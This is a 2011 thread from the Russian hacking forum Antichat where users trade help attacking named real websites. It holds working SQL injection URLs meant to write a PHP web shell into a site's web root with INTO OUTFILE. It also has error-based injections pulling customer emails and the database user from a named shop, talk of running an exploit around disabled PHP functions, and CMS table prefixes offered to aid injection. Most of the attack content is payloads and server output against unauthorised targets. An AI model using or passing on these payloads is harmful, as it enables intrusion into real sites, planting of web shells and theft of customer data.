ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.07.2011, 07:56
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от l.e.a.d.e.r
l.e.a.d.e.r said:
Подскажите как правильно заливать шелл через sql-inj.
Код:
Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45
поля 6 и 9
_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--
не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)
и опять 25, я что-то не так мб делаю?
Код:
Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+
1. Для записи шелла можно использовать не выводимые на страницу поля.
2. File_priv у учётной записи всё равно нет.
|
|
|
18.07.2011, 23:07
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
запрещены следующие функции php
Сообщение от None
escapeshellarg,escapeshellcmd,exec,passthru,proc_c lose,proc_get_status,proc_open,proc_nice,proc_term inate,shell_exec,system,ini_restore,popen,dl
Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать |
|
|
|
19.07.2011, 00:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Nightmarе
Nightmarе said:
echo `ls -la`;
Можно не благодарить
это алиас shell_exec, а он disabled - так что не прокатит.
|
|
|
|
19.07.2011, 16:07
|
|
Новичок
Регистрация: 27.04.2010
Сообщений: 0
Провел на форуме:
348
Репутация:
0
|
|
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
|
|
|
|
19.07.2011, 16:18
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Flashmx
Flashmx said:
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
эм... а из каких соображений там инъекция?
|
|
|
|
19.07.2011, 18:43
|
|
Новичок
Регистрация: 20.09.2009
Сообщений: 1
Провел на форуме:
76758
Репутация:
0
|
|
Подкиньте префиксы от таблиц.
|
|
|
|
19.07.2011, 19:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Vostok
Vostok said:
Подкиньте префиксы от таблиц.
Стандартные префиксы разные в каждой CMS.
Для DLE - dle_
Joomla - jos_
WordPress - wp_
И т. д.
|
|
|
|
19.07.2011, 19:39
|
|
Новичок
Регистрация: 27.04.2010
Сообщений: 0
Провел на форуме:
348
Репутация:
0
|
|
Сообщение от Seravin
Seravin said:
эм... а из каких соображений там инъекция?
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1
|
|
|
|
19.07.2011, 19:51
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Flashmx
Flashmx said:
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1
Третья ветка. Надо читать мануалы
Сообщение от Seravin
Seravin said:
эм... а из каких соображений там инъекция?
Прокрути страницу вниз
|
|
|
|
20.07.2011, 03:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
8271
Репутация:
0
|
|
Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.
Сообщение от None
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1
Well is that a vuln ? And If it, can you help me with creating a sql injections ?
Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...
Translate from google translator:
Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.
Сообщение от None
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1
Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?
Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
